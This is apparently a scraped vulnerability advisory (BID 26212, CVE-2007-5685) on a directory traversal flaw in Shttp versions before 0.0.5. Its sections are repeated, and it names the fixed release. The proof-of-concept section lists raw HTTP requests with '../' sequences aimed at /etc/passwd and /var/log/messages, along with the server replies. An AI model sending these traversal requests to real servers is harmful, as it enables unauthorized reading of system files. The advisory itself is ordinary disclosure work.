Shttp Remote Directory Traversal Vulnerability
BID:26212
Info
Shttp Remote Directory Traversal Vulnerability
| Bugtraq ID: | 26212 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5685 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 25 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | Pete Foster is credited with the discovery of this vulnerability. |
| Vulnerable: |
Vito Caputo Shttp 0.0.4 Vito Caputo Shttp 0.0.3 Vito Caputo Shttp 0.0.2 Vito Caputo Shttp 0.0.1 |
| Not Vulnerable: |
Vito Caputo Shttp 0.0.5 |
Discussion
Shttp Remote Directory Traversal Vulnerability
Shttp is prone to a remote directory-traversal vulnerability.
A remote attacker can exploit this issue by using directory-traversal sequences to retrieve arbitrary files on a victim user's computer.
Versions prior to Shttp0.0.5 are vulnerable to this issue.
Shttp is prone to a remote directory-traversal vulnerability.
A remote attacker can exploit this issue by using directory-traversal sequences to retrieve arbitrary files on a victim user's computer.
Versions prior to Shttp0.0.5 are vulnerable to this issue.
Exploit / POC
Shttp Remote Directory Traversal Vulnerability
To exploit this issue, attackers can use readily available network utilities.
The following HTTP requests demonstrate this issue:
HEAD /../../etc/passwd HTTP/1.0
HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Shttp/ServerKit
Date: Thu, 25 Oct 2007 16:31:30 GMT
Connection: close
HEAD /../../var/log/messages HTTP/1.0
HTTP/1.1 200 OK
Content-Length: 178455
Content-Type: text/plain
Last-Modified: Thu, 25 Oct 2007 16:36:39 GMT
Server: Shttp/ServerKit
Date: Thu, 25 Oct 2007 16:42:32 GMT
Connection: close
To exploit this issue, attackers can use readily available network utilities.
The following HTTP requests demonstrate this issue:
HEAD /../../etc/passwd HTTP/1.0
HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Shttp/ServerKit
Date: Thu, 25 Oct 2007 16:31:30 GMT
Connection: close
HEAD /../../var/log/messages HTTP/1.0
HTTP/1.1 200 OK
Content-Length: 178455
Content-Type: text/plain
Last-Modified: Thu, 25 Oct 2007 16:36:39 GMT
Server: Shttp/ServerKit
Date: Thu, 25 Oct 2007 16:42:32 GMT
Connection: close
Solution / Fix
Shttp Remote Directory Traversal Vulnerability
Solution:
The vendor released Shttp 0.0.5 to address this issue. Please see the references for more information.
Vito Caputo Shttp 0.0.1
Vito Caputo Shttp 0.0.2
Vito Caputo Shttp 0.0.3
Vito Caputo Shttp 0.0.4
Solution:
The vendor released Shttp 0.0.5 to address this issue. Please see the references for more information.
Vito Caputo Shttp 0.0.1
-
Vito Caputo shttp-0.0.5.tar.gz
http://serverkit.org/modules/contrib/shttp/shttp-0.0.5.tar.gz
Vito Caputo Shttp 0.0.2
-
Vito Caputo shttp-0.0.5.tar.gz
http://serverkit.org/modules/contrib/shttp/shttp-0.0.5.tar.gz
Vito Caputo Shttp 0.0.3
-
Vito Caputo shttp-0.0.5.tar.gz
http://serverkit.org/modules/contrib/shttp/shttp-0.0.5.tar.gz
Vito Caputo Shttp 0.0.4
-
Vito Caputo shttp-0.0.5.tar.gz
http://serverkit.org/modules/contrib/shttp/shttp-0.0.5.tar.gz
References
Shttp Remote Directory Traversal Vulnerability
References:
References:
- Shttp Home Page (Vito Caputo)
- Directory traversal flaw in shttp ("digineo Advisories"
)